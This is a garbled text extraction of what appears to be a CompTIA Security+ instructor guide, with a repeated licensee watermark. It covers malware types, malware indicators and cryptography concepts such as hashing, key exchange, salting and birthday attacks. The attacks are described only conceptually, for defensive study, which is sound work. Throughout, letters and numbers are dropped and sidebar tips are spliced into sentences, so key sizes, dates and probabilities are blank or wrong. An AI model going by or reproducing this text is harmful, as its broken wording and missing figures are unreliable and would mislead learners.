the control of the same malware instance can be manipulated as a botnet by the
herder program. A botnet can be used for many types of malicious purpose, including
triggering distributed denial of service DDo attacks, launching spam campaigns, or
performing cryptomining.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 87
SubSeven AT. (Screenshot used with permission from ikimedia Commons by CCAS .0 International.)
In indows, malware can only be manually installed with local administrator privileges. ootkits
This means the user must be confident enough in the installer package to enter the
credentials or accept the ser Account Control AC prompt. indows tries to protect
the system from abuse of administrator privileges. Critical processes run with a higher
level of privilege T M . Conse uently, Tro ans installed in the same way as regular
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
88 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
software cannot conceal their presence entirely and will show up as a running process
or service. ften the process image name is configured to be similar to a genuine
e ecutable or library to avoid detection. or e ample, a Tro an may use the filename
run d to mas uerade as run dll . To ensure persistence running when the
computer is restarted , the Tro an may have to use a registry entry or create itself as a
service, which can usually be detected fairly easily.
If the malware can be delivered as the payload for an e ploit of a severe vulnerability,
it may be able to e ecute without re uiring any authori ation using T M privileges.
Alternatively, the malware may be able to use an e ploit to escalate privileges after
installation. Malware running with this level of privilege is referred to as a rootkit. The
term derives from NI Linu where any process running as root has unrestricted
access to everything from the root of the file system down.
In theory, there is nothing about the system that a rootkit could not change. In practice,
indows uses other mechanisms to prevent misuse of kernel processes, such as
code signing microsoft.com security blog hardening the system and
maintaining integrity with windows defender system guard . Conse uently, what
a rootkit can do depends largely on adversary capability and level of e ort. hen
dealing with a rootkit, you should be aware that there is the possibility that it can
compromise system files and programming interfaces, so that local shell processes,
such as plorer, taskmgr, or tasklist on indows or ps or top on Linu , plus port
scanning tools, such as netstat, no longer reveals its presence at least, if run from the
infected machine . A rootkit may also contain tools for cleaning system logs, further
concealing its presence microsoft.com en us wdsi threats malware encyclopedia
description Name in fCutwail .
Software processes can run in one of several rings. ing 0 is the most privileged (it
provides direct access to hardware) and so should be reserved for kernel processes only.
ing is where user-mode processes run drivers and I O processes may run in ing 1 or
ing . This architecture can also be complicated by the use of virtualization.
There are also e amples of rootkits that can reside in firmware either the computer
firmware or the firmware of any sort of adapter card, hard drive, removable drive, or
peripheral device . These can survive any attempt to remove the rootkit by formatting
the drive and reinstalling the . or e ample, the intelligence agencies have
developed DarkMatter and uarkMatter I rootkits targeting the firmware on Apple
Macbook laptops pcworld.com article after cia leak intel security releases
detection tool for efi rootkits.html .
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 89
The crypto malware class of ransomware attempts to encrypt data files on any fi ed,
removable, and network drives. If the attack is successful, the user will be unable to
access the files without obtaining the private encryption key, which is held by the
attacker. If successful, this sort of attack is e tremely difficult to mitigate, unless the
user has up to date backups of the encrypted files. ne e ample of this is Cryptolocker,
a Tro an that searches for files to encrypt and then prompts the victim to pay a sum of
money before a certain countdown time, after which the malware destroys the key that
allows the decryption.
ansomware uses payment methods, such as wire transfer, cryptocurrency, or
premium rate phone lines, to allow the attacker to e tort money without revealing his
or her identity or being traced by local law enforcement.
Another type of crypto malware hi acks the resources of the host to perform
cryptocurrency mining. This is referred to as crypto-mining or crypto acking. The total
number of coins within a cryptocurrency is limited by the difficulty of performing the
calculations necessary to mint a new digital coin. Conse uently, new coins can be very
valuable, but it takes enormous computing resources to discover them. Crypto acking
is often performed across botnets.
ome types of malware do not trigger automatically. aving infected a system, they
wait for a pre configured time or date time bomb or a system or user event logic
bomb . Logic bombs also need not be malware code. A typical e ample is a disgruntled
system administrator who leaves a scripted trap that runs in the event his or her
account is deleted or disabled. Anti virus software is unlikely to detect this kind of
malicious script or program. This type of trap is also referred to as a mine.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
90 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Sandbox Execution
If it is not detected by endpoint protection, you may want to analy e the suspect code
in a sandbo ed environment. A sandbox is a system configured to be completely
isolated from its host so that the malware cannot break out. The sandbo will be
designed to record file system and registry changes plus network activity. Cuckoo
is packaged software that aims to provide a turnkey sandbo solution
cuckoosandbo .org .
Resource Consumption
Abnormal resource consumption can be detected using a performance monitor, Task
Manager, or the top Linu utility. Indicators such as e cessive and continuous C
usage, memory leaks, disk read write activity, and disk space usage can be signs of
malware, but can also be caused by many other performance and system stability
issues. Also, it is only really poorly written malware or malware that performs intensive
operations botnet DDo , crypto acking, and cryptoransomware, for instance that
displays this behavior. esource consumption could be a reason to investigate a
system rather than definitive proof of infection.
File System
hile fileless malware is certainly prevalent, file system change or anomaly analysis
is still necessary. ven if the malware code is not saved to disk, the malware is still
likely to interact with the file system and registry, revealing its presence by behavior.
A computer's file system stores a great deal of useful metadata about when files were
created, accessed, or modified. Analy ing these metadata and checking for suspicious
temporary files can help you establish your timeline of events for an incident that has
left traces on a host and its files.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 91
version of Task Manager. ou can view e tra information about each process and
better understand how processes are created in parent child relationships.
In this e ample, the Metasploit ramework is being used to obtain access via a
remotely e ecuted ower hell prompt, with privileges obtained by passing a captured
hash. This attack leverages the ysinternals s ec utility to drop a service e ecutable
into the Admin share on the remote machine. In this variant of the attack, the service
starts ower hell. ointing to the powershell.e e image in rocess plorer shows the
parameters that the process launched with. In this case, the command used to start
this is not typical of ower hell usage. There is a long string of characters, which is
binary code represented in ase . The script is in ecting this into a new DLL, stored in
memory only.
Observing use of PsExec to invoke a PowerShell script that creates memory-resident shellcode.
(Screenshot Process Explorer docs.microsoft.com en-us sysinternals.)
This sort of behavior can only be observed in real time when the malware is e ecuted
in a sandbo . Threat hunting and automated detection tools can use detailed logging,
such as that provided by ystem Monitor github.com wift n ecurity sysmon config ,
to record and identify malicious process behavior.
Along with observing how a process interacts with the file system, network activity is
one of the most reliable ways to identify malware. Threat data can be used to correlate
connections to known bad I addresses and domains, but malware may try to connect
to continually shifting endpoints, utili ing techni ues such as fast u and domain
generation algorithms D A . It may try to use social media and cloud services to blend
in with legitimate traffic.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
92 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Indicators of Malware-Based Attacks
Answer the following uestions
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 93
Lesson 4
Summary
ou should be able to identify the social engineering and malware based methods that Teaching
threat actors use to e ect intrusions. Tip
Check that students
Guidelines for Identifying Social Engineering and Malware are confident about
the content that has
been covered. If there
ollow these guidelines when you use security assessments to protect security systems
is time, revisit any
against social engineering and malware attacks content e amples that
• se training and education programs to help employees to recogni e how social they have uestions
about. If you have
engineering is e ective authority, intimidation, consensus, scarcity, familiarity, trust, used all the available
and urgency . time for this lesson
block, note the issues,
• se policies and procedures that hinder social engineers from eliciting information and schedule time for
or obtaining unauthori ed access. a review later in the
course.
• ducate users to recogni e phishing and pharming attempts, such as validating
domain names and identifying suspicious messages. Interaction
Opportunity
• se training and education programs to help employees recogni e types of malware ptionally, discuss
threat Tro an, , spyware, backdoor, bots, rootkits, and ransomware and the with students how
vectors by which malware can e ecute. they might have
e perience of social
• se security filters and limited privileges to restrict the ability of users to e ecute engineering or
infected files or scripts. malware attacks,
the impact they had,
• Consider implementing behavior based endpoint protection suites that can perform and how they were
resolved.
more e ective detection of fileless malware.
• Consider using threat data feeds to assist with identification of command and
control networks.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Lesson 5
Summarizing Basic
Cryptographic Concepts
Lesson Objectives
In this lesson, you will
• Compare and contrast cryptographic ciphers.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
96 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 5A
Compare and Contrast
Cryptographic Ciphers
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 97
Hashing is the simplest type of cryptographic operation. A cryptographic hashing ashing Algorithms
algorithm produces a fi ed length string from an input plainte t that can be of any
length. The output can be referred to as a checksum, message digest, or hash, The Teaching
function is designed so that it is impossible to recover the plaintext data from the Tip
digest one way and so that di erent inputs are unlikely to produce the same output Hash functions are
(a collision). mostly used for
integrity (signatures
A hashing algorithm is used to prove integrity. or e ample, ob and Alice can compare and message digests)
the values used for a password in the following way and password storage
confidentiality .
1. Bob already has a digest calculated from Alice's plaintext password. Bob cannot
recover the plaintext password value from the hash. hile the names
of cryptographic
2. hen Alice needs to authenticate to ob, she types her password, converts it to a algorithms have been
removed from the
hash, and sends the digest to ob. certification ob ectives,
they are still present
3. ob compares Alice's digest to the hash value he has on file. If they match, he can in the acronyms list,
be sure that Alice typed the same password. and the injunction
on the acronyms list
As well as comparing password values, a hash of a file can be used to verify the is "Candidates are
integrity of that file after transfer. encouraged to review
the complete list
1. Alice runs a hash function on the setup.e e file for her product. he publishes the and attain a working
digest to her website with a download link for the file. knowledge of all listed
acronyms as part of a
2. ob downloads the setup.e e file and makes a copy of the digest. comprehensive exam
preparation program."
3. ob runs the same hash function on the downloaded setup.e e file and Conse uently, the
compares it to the reference value published by Alice. If it matches the value names of the main
published on the website, the integrity of the file can be assumed. products have been
retained.
4. Consider that Mallory might be able to substitute the download file for a The syllabus also uses
malicious file. Mallory cannot change the reference hash, however. the term checksum
for a message digest
5. This time, ob computes a hash but it does not match, leading him to suspect (under the forensics
that the file has been tampered with. objective) so we
are using that here
too. You might want
to note that hash
functions produce
a specific type of
checksum, but there
are others with
di erent properties,
such as a parity
checksum.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
98 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Computing an S A value from a file. (Screenshot used with permission from icrosoft.)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
100 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
e en th
The range of key values available to use with a particular cipher is called the keyspace.
The keyspace is roughly equivalent to two to the power of the size of the key. Using a
longer key bits rather than bits, for instance makes the encryption scheme
stronger. You should realize that key lengths are not equivalent when comparing
di erent algorithms, however. ecommendations on minimum key length for any
given algorithm are made by identifying whether the algorithm is vulnerable to
cryptanalysis techniques and by the length of time it would take to "brute force" the
key, given current processing resources.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 101
5. Bob receives the message and is able to decrypt it using his private key.
6. If Mallory has been snooping, he can intercept both the message and the public
key.
7. owever, Mallory cannot use the public key to decrypt the message, so the
system remains secure.
Asymmetric encryption can be used to prove identity. The holder of a private key
cannot be impersonated by anyone else. The drawback of asymmetric encryption is
that it involves substantial computing overhead compared to symmetric encryption.
The message cannot be larger than the key si e. here a large amount of data is being
encrypted on disk or transported over a network, asymmetric encryption is inefficient.
Conse uently, asymmetric encryption is mostly used for authentication and non
repudiation and for key agreement and exchange. Key agreement/exchange refers
to settling on a secret symmetric key to use for bulk encryption without anyone else
Show Slide(s)
discovering it.
Public Key
u lic e Cr pto raph Al orithms Cryptography
Algorithms
Asymmetric encryption is often referred to as public key cryptography. Many public
key cryptography products are based on the RSA algorithm. on ivest, Adi hamir, Teaching
and Leonard Adleman published the A cipher in rsa.com . The A algorithm Tip
provides the mathematical properties for deriving key pairs and performing the
There's not much
encryption and decryption operations. This type of algorithm is called a trapdoor point trying to
function, because it is easy to perform using the public key, but difficult to reverse describe ECC without
without knowing the private key. mentioning A.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
102 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Elliptic curve cryptography (ECC) is another type of trapdoor function that can be
used in public key cryptography ciphers. The principal advantage of CC over A's
algorithm is that there are no known "shortcuts" to cracking the cipher or the math
that underpins it, regardless of key length. Conse uently, CC used with a key si e of
bits is very appro imately comparable to A with a key si e of bits.
SA key pair security depends on the difficulty of finding the prime factors of very large
integers (modular exponentiation). ECC depends on the discrete logarithm problem.
Cloud are have produced an excellent overview of the differences (blog.cloud are.com a-
relatively-easy-to-understand-primer-on-elliptic-curve-cryptography).
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 103
Review Activity:
Cryptographic Ciphers
Answer the following uestions
In cryptography, the security of the message is guaranteed by the security of the key.
The system does not depend on hiding the algorithm or the message (security by
obscurity).
Because two parties can hash the same data and compare checksums to see if they
match, hashing can be used for data verification in a variety of situations, including
password authentication. ashes of passwords, rather than the password plainte t,
can be stored securely or e changed for authentication. A hash of a file or a hash code
in an electronic message can be verified by both parties.
Confidentiality symmetric ciphers are generally fast and well suited to bulk encrypting
large amounts of data.
Each key can reverse the cryptographic operation performed by its pair but cannot
reverse an operation performed by itself. The private key must be kept secret by the
owner, but the public key is designed to be widely distributed. The private key cannot
be determined from the public key, given a sufficient key si e.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
104 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 5B
Summarize Cryptographic
odes o peration
4. Bob then calculates his own checksum for the document (using the same
algorithm as Alice) and compares it with Alice's hash.
If the two hashes are the same, then the data has not been tampered with during
transmission, and Alice's identity is guaranteed. If either the data had changed or a
malicious user Mallory had intercepted the message and used a di erent private key,
the digests would not match.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 105
It is important to remember that a digital signature is a hash that is then encrypted using
a private key. ithout the encryption, another party could easily intercept the file and the
hash, modify the file and compute a new hash, and then send the modified file and hash
to the recipient. It is also important to realize that the recipient must have some means of
validating that the public key really was issued by Alice. Also note that digital signatures do
not provide any message confidentiality.
The Digital Signature Algorithm (DSA) is a slightly di erent format for achieving
the same sort of goal. D A uses elliptic curve cryptography CC rather than the A
cipher.
Symmetric encryption is the only practical means of encrypting and decrypting Digital nvelopes and
large amounts of data bulk encryption , but it is difficult to distribute the secret key Key Exchange
securely. ublic key cryptography makes it easy to distribute a key, but can only be
used efficiently with small amounts of data. Therefore, both are used within the same Teaching
product in a type of key exchange system known as a digital envelope or hybrid Tip
encryption. A digital envelope allows the sender and recipient to exchange a symmetric Stress that asymmetric
encryption key securely by using public key cryptography encryption is slow,
and so is only used
1. Alice obtains a copy of Bob's public key. on small amounts of
data (signing hashes
2. Alice encrypts her message using a secret key cipher, such as A . In this conte t, or encrypting secret
the secret key is referred to as a session key. keys).
4. Alice attaches the encrypted session key to the ciphertext message in a digital
envelope and sends it to ob.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
106 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Note that in this process, it is the recipient's public key that is used to perform
encryption and the recipient's private key that is used for decryption. The validity of the
whole digital envelope can be proved using a message authentication code.
In all these implementations, it is critical that the private key be kept secure and available
only to the authorized user.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 107
hen using a digital envelope, the parties must e change or agree upon a bulk Perfect Forward
encryption secret key, used with the chosen symmetric cipher. In the original Secrecy
implementation of digital envelopes, the server and client e change secret keys, using
the server's A key pair to protect the e change from snooping. In this key e change Teaching
model, if data from a session were recorded and then later the server's private key Tip
were compromised, it could be used to decrypt the session key and recover the The terms "key
confidential session data. exchange" and "key
agreement" are often
This risk from A key e change is mitigated by perfect forward secrecy (PFS). PFS taken to mean the
uses i e ellman key agreement to create ephemeral session keys without same thing, but point
using the server's private key. Diffie ellman allows Alice and ob to derive the same out that there are
shared secret just by agreeing some values that are all related by some trapdoor di erent mechanisms.
ith key agreement,
function. In the agreement process, they share some of them, but keep others private. the client does not
Mallory cannot possibly learn the secret from the values that are exchanged publicly transmit an encrypted
(en.wikipedia.org wiki Diffie ellman key e change). The authenticity of session key to the
the values sent by the server is proved by using a digital signature. server. The client and
server use Diffie
ellman D to
derive the same secret
key value.
Note that in TLS
. , only cipher
suites are allowed.
A key e change is
deprecated. The A
algorithm can still
be used for signing,
however. The values
exchanged as part of
D need to be signed
to prove authenticity
and prevent a man in
the middle attack.
Using iffie- ellman to derive a secret value to use to generate a shared symmetric encryption
key securely over a public channel. (Images 1 .com.)
Using ephemeral session keys means that any future compromise of the server will not
translate into an attack on recorded data. Also, even if an attacker can obtain the key
for one session, the other sessions will remain confidential. This massively increases
the amount of cryptanalysis that an attacker would have to perform to recover an
entire "conversation."
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
108 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
In 01 , a eartbleed bug was discovered in the way some versions of OpenSS work that
allows remote users to grab 6 chunks of server memory contents (heartbleed.com). This
could include the private key, meaning that any communications with the server could be
compromised. The bug had been present for around two years. This illustrates the value of
P S, but ironically many servers would have been updated to the buggy version of OpenSS
to enable support for P S.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 109
Symmetric algorithms do not provide message integrity or authentication. The basic Authenticated Modes
C C and counter modes of operation are unauthenticated. hile a man in the middle of Operation
cannot decrypt them directly without the secret key, the cipherte ts are vulnerable to
arbitrary data being inserted or modified to break the encryption scheme, referred to Teaching
as a chosen ciphertext attack. Tip
Students should not
Authenticated Encryption need to recognize the
cipher suite names
A message authentication code (MAC) provides an authentication and integrity for the e am, but
mechanism by hashing a combination of the message output and a shared secret in practical terms
key. The recipient can perform the same process using his or her copy of the secret they would be highly
recommended to
key to verify the data. This type of authenticated encryption scheme is specified in a
learn them anyway,
cipher suite as separate functions, such as A C C with MAC A. nfortunately, not least because
the implementation of this type of authenticated mode in AES CBC is vulnerable to a TL . is reduced to
type of cryptographic attack called a padding oracle attack (docs.microsoft.com en us just three algorithms.
dotnet standard security vulnerabilities cbc mode). Conse uently, we
are including the
Authenticated Encryption with Additional Data (AEAD) relevant acronyms for
recognition purposes,
The weaknesses of CBC arising from the padding mechanism means that stream but not trying to
e plain the di erence
ciphers or counter modes are strongly preferred. These use Authenticated Encryption between, say, MAC
with Additional Data A AD modes of operation. In an A AD scheme, the associated and C C MAC.
data allows the receiver to use the message header to ensure the payload has not
been replayed from a di erent communication stream.
An A AD mode is identified by a single hyphenated function name, such as A CM or
A CCM. The ChaCha oly stream cipher has been developed as an alternative
to AES.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
110 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
ryptographic odes o peration
Answer the following uestions
A hashing function is used to create a message digest. The digest is then signed using
the sender's private key. The resulting signature can be decrypted by the recipient
using the sender's public key and cannot be modified by any other agency. The
recipient can calculate his or her own digest of the message and compare it to the
signed hash to validate that the message has not been altered.
The recipient's public key (typically from the server's key pair).
True. PFS ensures that ephemeral keys are used to encrypt each session. These keys
are destroyed after use.
Diffie ellman allows the sender and recipient to derive the same value the session
key from some other pre agreed values. ome of these are e changed, and some kept
private, but there is no way for a snooper to work out the secret ust from the publicly
exchanged values. This means session keys can be created without relying on the
server's private key, and that it is easy to generate ephemeral keys that are di erent
for each session.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 111
Topic 5C
Summarize Cryptographic Use
ases and eaknesses
Encryption allows sub ects to identify and authenticate themselves. The sub ect could
be a person, or a computer such as a web server.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
112 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Non repudiation is linked to identification and authentication. It is the concept that the
sender cannot deny sending the message. If the message has been encrypted in a way
known only to the sender, it follows that the sender must have composed it.
Authentication and non repudiation depend on the recipient not being able to encrypt
the message, or the recipient would be able to impersonate the sender. This means
that to support authentication and repudiation, recipients must be able to use the
cryptographic process to decrypt authentication and integrity data, but not to encrypt
it. This use case is supported by asymmetric encryption ciphers and public/private
key pairs.
To use a key pair, the user or server generates the linked keys. The private key is stored
securely and protected from use by others by the account password. It is critical that
only the user or server be able to use the private key. The public key is given to clients
or correspondents, usually in the form of a digital certificate.
hen the user or server needs to authenticate, it encrypts some agreed hashed data
using the private key and sends it to the client as a digital signature. The client should
be able to decrypt the signature using the public key and derive the same hash value.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 113
Integrity is proved by hashing algorithms, which allow two parties to derive the same Cryptography
checksum and show that a message or data has not been tampered with. A basic hash Supporting Integrity
function can also be used with a shared secret to create a message authentication and esiliency
code (MAC), which prevents a man in the middle tampering with the checksum.
Teaching
As well as providing integrity at the level of individual messages, cryptography can be Tip
used to design highly resilient control systems. A control system is one with multiple
C s Dr Ian Levy's
parts, such as sensors, workstations, and servers, and comple operating logic. uch article on designing
a system is resilient if compromise of a small part of the system is prevented from the security system
allowing compromise of the whole system. Cryptography assists this goal by ensuring for smart meters in
the authentication and integrity of messages delivered over the control system. the UK (ncsc.gov.
uk/information/
Integrity and resiliency are also an issue for computer code. If a threat actor has the smart security
administrator privileges, they can change the operation of legitimate code to make it behind the gb smart
work as malware. A developer can make tampering more difficult using obfuscation. metering system) is a
Obfuscation is the art of making a message difficult to understand. bfuscated source good example of some
of the considerations
code is rewritten in a way that does not a ect the way the computer compiles or that go into the design
e ecutes the code, but makes it difficult for a person reading the code to understand of a highly resilient
how it works. system.
Cryptography is a very e ective way of obfuscating a message, but unfortunately, it
is too e ective in the case of source code because it also means the code cannot be
understood e ecuted by the computer. At some point, the code must be decrypted to
be executed. The key used for decryption usually needs to be bundled with the source
code, and this means that you are relying on security by obscurity rather than strong
cryptography. Attempts to protect an embedded key while preserving the functionality
of the code—known as white box cryptography—have all been broken. There are no
commercial solutions currently available to overcome this problem, but the sub ect is
one of much research interest.
Di erences between ciphers make them more or less useful for resource constrained Cryptographic
environments. The main performance factors are as follows Performance
Limitations
• peed for symmetric ciphers and hash functions, speed is the amount of data per
second that can be processed. Asymmetric ciphers are measured by operations per Teaching
second. Speed has the most impact when large amounts of data are processed. Tip
• Time latency for some use cases, the time re uired to obtain a result is more The syllabus places
a lot of emphasis on
important than a data rate. or e ample, when a secure protocol depends on
limitations and use
ciphers in the handshake phase, no data transport can take place until the cases, so make sure
handshake is complete. This latency, measured in milliseconds, can be critical to students understand
performance. these factors.
• i e the security of a cipher is strongly related to the si e of the key, with longer
keys providing better security. Note that the key size cannot be used to make
comparisons between algorithms. or e ample, a bit CC key is stronger than
a bit A key. Larger keys will increase the computational overhead for each
operation, reducing speed and increasing latency.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
114 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
In selecting a product or individual cipher for a particular use case, a tradeo must
be achieved between the demand for the best security available and the resources
available for implementation.
• Low power devices some technologies or ciphers configured with longer keys
require more processing cycles and memory space. This makes them slower
and means they consume more power. Conse uently, some algorithms and key
strengths are unsuitable for handheld devices and embedded systems, especially
those that work on battery power. Another e ample is a contactless smart card,
where the card only receives power from the reader and has fairly limited storage
capacity, which a ects the ma imum key si e supported.
• Low latency uses—this can impact protocol handshake setup times. A longer
Show Slide(s) handshake will manifest as delay for the user, and could cause timeout issues
with some applications. Also, if cryptography is deployed with a real time sensitive
Cryptographic Security channel, such as voice or video, the processing overhead on both the transmitter
Limitations and receiver must be low enough not to impact the uality of the signal.
Teaching
Tip Cryptographic Security Limitations
You can illustrate a
weak key problem esource constraints may re uire you to make a tradeo between security and
by referencing the performance, but you cannot trade too far.
Debian pen L
vulnerability. Two lines ntrop and ea e s
of code in Debian's
OpenSSL package Entropy is a measure of disorder. A plaintext will usually exhibit low entropy as
were removed when it represents a message in a human language or programming language or data
highlighted by a
debugging application.
structure. The plainte t must be ordered for it to be intelligible to a person, computer
These two lines processor, or database. ne of the re uirements of a strong cryptographic algorithm is
were responsible to produce a disordered cipherte t. ut another way, the cipherte t must e hibit a high
for ensuring that level of entropy. If any elements of order from the plainte t persist, it will make the
the keyspace was cipherte t vulnerable to cryptanalysis, and the algorithm can be shown to be weak.
large and random.
Conse uently, for It is important to reali e that ust because an algorithm, such as A , is considered
two years, Debian strong does not mean that the implementation of that cipher in a programming library
OpenSSL servers is also strong. The implementation may have weaknesses. It is vital to monitor the
using this patch were
status of this type of programming code and apply updates promptly. If a weakness
generating keys from
a range of about is revealed, any keys issued under the weak version must be replaced and data re
, . Another encrypted.
e ample is the N A
inserted backdoor in A weak key is one that produces ciphertext that is lower entropy than it should be. If
a N proposed for a key space contains weak keys, the technology using the cipher should prevent use
use with ECC (isaca. of these keys. D and RC4 are examples of algorithms known to have weak keys. The
org resources isaca way a cipher is implemented in software may also lead to weak keys being used. An
ournal issues e ample of this is a bug in the pseudo random number generator for the pen L
volume can elliptic
server software for Debian Linu , discovered in wiki.debian.org/SSLkeys). A
curve cryptography
be trusted a brief weak number generator leads to many published keys sharing a common factor. A
analysis of the cryptanalyst can test for the presence of these factors and derive the whole key much
security of a popular more easily. Conse uently, the true random number generator (TRNG) or pseudo
cryptosyste). RNG (PRNG) module in the cryptographic implementation is critical to its strength.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 115
You can read more about true versus pseudo random number generation at random.org.
• Salt this is also a random or pseudo random number or string. The term salt is
used specifically in con unction with hashing password values.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
116 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
2. Mallory intercepts the communication, retaining ob's public key, and sends his
own public key to Alice.
4. Mallory intercepts the message and decrypts it using his private key.
5. Mallory then encrypts a message (possibly changing it) with Bob's public
key and sends it to ob, leaving Alice and ob oblivious to the fact that their
communications have been compromised.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 117
requests the use of SSL. It then becomes easier for Mallory to forge the signature of a
certificate authority that Alice trusts and have Alice trust his public key.
ntropy is a concern whenever a cryptographic system makes use of user generated ey tretching and
data, such as a password. sers tend to select low entropy passwords, because they Salting
are easier to remember. A couple of technologies try to compensate for this.
e tretchin
e stretchin takes a key that's generated from a user password and repeatedly
converts it to a longer and more random key. The initial key may be put through
thousands of rounds of hashing. This might not be difficult for the attacker to replicate
so it doesn't actually make the key stronger, but it slows the attack down, as the
attacker has to do all this extra processing for each possible key value. Key stretching
can be performed by using a particular software library to hash and save passwords
when they are created. The ass ord ased e eri ation unction is
very widely used for this purpose, notably as part of i i rotected Access A.
Salting
Passwords stored as hashes are vulnerable to brute force and dictionary attacks. A
password hash cannot be decrypted hash functions are one way. owever, an attacker
can generate hashes to try to find a match for password hash captured from network
traffic or password file. A brute force attack simply runs through every possible
combination of letters, numbers, and symbols. A dictionary attack creates hashes of
common words and phrases.
oth these attacks can be slowed down by adding a salt value when creating the hash,
so you compute
(salt + password) * SHA = hash
The salt is not kept secret, because any system verifying the hash must know the value
of the salt. It simply means that an attacker cannot use pre computed tables of hashes.
The hash values must be recompiled with the specific salt value for each password.
A birthday attack is a type of brute force attack aimed at exploiting collisions in Collisions and the
hash functions. A collision is where a function produces the same hash value for two Birthday Attack
di erent plainte ts. This type of attack can be used for the purpose of forging a digital
signature. The attack works as follows
1. The attacker creates a malicious document and a benign document that produce
the same hash value. The attacker submits the benign document for signing by
the target.
2. The attacker then removes the signature from the benign document and adds it
to the malicious document, forging the target's signature.
The trick here is being able to create a malicious document that outputs the same hash
as the benign document. The birthday paradox means that the computational time
required to do this is less than might be expected. The birthday paradox asks how large
must a group of people be so that the chance of two of them sharing a birthday is .
The answer is , but people who are not aware of the parado often answer around
. The point is that the chances of someone sharing a particular birthday are
small, but the chances of any two people sharing any birthday get better and better as
you add more people ... )
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
118 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
To e ploit the parado , the attacker creates multiple malicious and benign documents,
both featuring minor changes punctuation, e tra spaces, and so on . Depending on the
length of the hash and the limits to the non suspicious changes that can be introduced,
if the attacker can generate sufficient variations, then the chance of matching hash
outputs can be better than .
This means that to protect against the birthday attack, encryption algorithms must
demonstrate collision avoidance that is, to reduce the chance that di erent inputs
will produce the same output . To e ploit the birthday parado , the attacker generally
has to be able to manipulate both documents messages, referred to as a chosen prefix
attack (sha mbles.github.io). The birthday paradox method has been used successfully
to e ploit collisions in the MD function to create fake digital certificates that appear
to have been signed by a certificate authority in a trusted root chain trailofbits.files.
wordpress.com ame md .pdf).
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 119
Review Activity:
Cryptographic Use
ases and eaknesses
Answer the following uestions
